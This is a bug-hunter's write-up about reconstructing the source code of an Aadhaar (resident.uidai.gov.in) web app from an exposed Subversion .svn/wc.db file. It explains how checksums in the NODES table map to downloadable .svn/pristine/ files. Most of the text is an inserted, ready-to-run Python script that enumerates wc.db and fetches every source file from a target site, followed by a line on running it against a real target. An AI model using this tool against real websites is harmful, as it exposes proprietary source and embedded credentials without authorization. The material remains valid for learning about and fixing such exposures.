Hi guys, I recently found an exposed .svn/wc.db file on resident.uidai.gov.in and used it to reconstruct the web app's source code. I could not find any article about exposed .svn directories, so this should be useful for anyone who finds .svn on a website.
What is .svn/wc.db?
.svn/wc.db is the SQLite database that Subversion (a centralized version control system) keeps inside the .svn directory of a working copy; since Subversion 1.7 there is a single .svn directory at the root of the working copy. It records the state of the working copy: every versioned path, its kind (file or directory), its revision, the checksum of its content, when it was last updated, and any local modifications. Subversion uses it to track changes to the files in the working copy and to manage merging changes from the repository into the working copy.
What is the difference between .svn/wc.db and .git?
.svn/wc.db is a single SQLite database file used by Subversion, a centralized VCS.
.git, on the other hand, is a directory used by Git, a distributed VCS; it holds the whole object database (commits, trees and blobs) plus refs and config, so an exposed .git gives up the full history, not just the current checkout.
Note: I haven't used any directory or file brute-forcing. I used a Chrome extension called DotGit, which automatically finds exposed .git and .svn directories on websites while you browse.
Let's look at how I downloaded all the source code of an Aadhaar website
I just appended .svn/wc.db to https://resident.uidai.gov.in and downloaded the database file.
When I opened the database file in DB Browser for SQLite, I came across a lot of tables.
The NODES table has many columns, but the two important ones are local_relpath and checksum:
local_relpath → the path of the file, relative to the working-copy root (here, the web root)
checksum → the SHA-1 of the file's unmodified (pristine) content, stored as $sha1$<hex>
For example:
local_relpath = /Bio-Lock-Enable.php
checksum = $sha1$c7fb9f76455733203cb734de0c6016366d729458
SVN keeps an unmodified ("pristine") copy of every versioned file in one location, .svn/pristine/, named by its SHA-1: the first two hex characters of the digest form a subdirectory and the full digest plus .svn-base is the filename. So the file above lives at .svn/pristine/c7/c7fb9f76455733203cb734de0c6016366d729458.svn-base, and fetching that URL returns its source. Note that the pristine copy is the last checked-out or updated revision; any uncommitted local edits made on the server are not in it.
It is easy to download a single file with wget, but I had more than 500 paths, so I wrote a simple script to download all the source code.
link to the below code ↓
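The following is an added example of such a script, not the author's original one. It opens a wc.db, lists every file node with its checksum, maps each checksum to its .svn/pristine/ path, fetches it from the target, and writes it under an output directory. It assumes a Subversion 1.7+ working copy with a single .svn directory at the web root, and that the server serves .svn/ verbatim; the base URL https://example.com/, the sample NODES rows and the fake server responses are constructed for the offline demo. The fetcher is injectable so the logic runs without network access, and the output-path check refuses a hostile local_relpath such as ../etc/passwd, which a malicious wc.db could contain.

```python
# Added example (not the author's script). Assumes a Subversion 1.7+ working
# copy with a single .svn/ at the web root, served verbatim by the web server.
import os
import sqlite3
import tempfile
import urllib.request

def pristine_relpath(checksum):
    """'$sha1$<40 hex>' -> '.svn/pristine/<first 2 hex>/<sha1>.svn-base'."""
    prefix = "$sha1$"
    if not checksum.startswith(prefix):
        raise ValueError("unexpected checksum format: %r" % checksum)
    digest = checksum[len(prefix):].lower()
    if len(digest) != 40 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("malformed SHA-1 digest: %r" % checksum)
    return ".svn/pristine/%s/%s.svn-base" % (digest[:2], digest)

def list_versioned_files(db_path):
    """(local_relpath, checksum) for every file node. NODES holds one row per
    op_depth, so DISTINCT collapses duplicates; directories have no checksum."""
    con = sqlite3.connect(db_path)
    try:
        return con.execute(
            "SELECT DISTINCT local_relpath, checksum FROM NODES "
            "WHERE kind = 'file' AND checksum IS NOT NULL ORDER BY local_relpath"
        ).fetchall()
    finally:
        con.close()

def safe_local_path(out_dir, relpath):
    """Join relpath under out_dir, refusing rows that escape it (e.g. '../')."""
    relpath = relpath.lstrip("/")  # wc.db paths are relative to the wc root
    root = os.path.realpath(out_dir)
    target = os.path.realpath(os.path.join(root, relpath))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("refusing to write outside %s: %r" % (out_dir, relpath))
    return target

def http_fetch(url):
    """Default fetcher: GET url and return the body (raises OSError on failure)."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return resp.read()

def dump_source(db_path, base_url, out_dir, fetch=http_fetch):
    """Fetch every pristine file named in wc.db into out_dir. base_url is the
    directory exposing .svn/; fetch(url) -> bytes. Returns {relpath: url}."""
    base_url = base_url.rstrip("/") + "/"
    written = {}
    for relpath, checksum in list_versioned_files(db_path):
        try:
            dest = safe_local_path(out_dir, relpath)  # validate before fetching
            url = base_url + pristine_relpath(checksum)
            data = fetch(url)
        except (ValueError, OSError) as exc:  # bad row, hostile path, HTTP error
            print("skip %s: %s" % (relpath, exc))
            continue
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "wb") as fh:
            fh.write(data)
        written[relpath] = url
    return written

def make_sample_wc_db(path):
    """Constructed stand-in for wc.db with only the NODES columns used above."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, "
                "checksum TEXT, op_depth INTEGER)")
    con.executemany("INSERT INTO NODES VALUES (?, ?, ?, ?)", [
        ("", "dir", None, 0),
        ("Bio-Lock-Enable.php", "file",
         "$sha1$c7fb9f76455733203cb734de0c6016366d729458", 0),
        ("includes/db.php", "file", "$sha1$" + "ab" * 20, 0),
        ("includes/db.php", "file", "$sha1$" + "ab" * 20, 1),  # duplicate row
        ("../etc/passwd", "file", "$sha1$" + "cd" * 20, 0),    # hostile row
    ])
    con.commit()
    con.close()

def run_demo():
    """Run dump_source offline against the constructed wc.db and a fake server."""
    work = tempfile.mkdtemp()
    db = os.path.join(work, "wc.db")
    make_sample_wc_db(db)
    base = "https://example.com/"
    fake_server = {  # constructed responses keyed by pristine URL
        base + pristine_relpath("$sha1$c7fb9f76455733203cb734de0c6016366d729458"):
            b"<?php // Bio-Lock-Enable.php\n",
        base + pristine_relpath("$sha1$" + "ab" * 20): b"<?php $pass = 'x';\n",
    }
    def fake_fetch(url):
        if url not in fake_server:
            raise OSError("HTTP 404 for %s" % url)
        return fake_server[url]
    out = os.path.join(work, "src")
    written = dump_source(db, base, out, fetch=fake_fetch)
    contents = {p: open(safe_local_path(out, p), "rb").read() for p in written}
    return written, contents
```

Against a real target you would call dump_source("wc.db", "https://target/", "out") with the default fetcher; the demo's fake server stands in for the site. Rows whose pristine file is missing (deleted or never committed) are skipped and reported rather than aborting the whole run.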
Finally, I got the complete source code of the Aadhaar website.
The Indian government has fixed the issue, and I encourage ethical hacking practices.
Here are some more good resources:
Special thanks to Dinesh Kumar for guiding me.
Thanks for taking the time to read my write-up.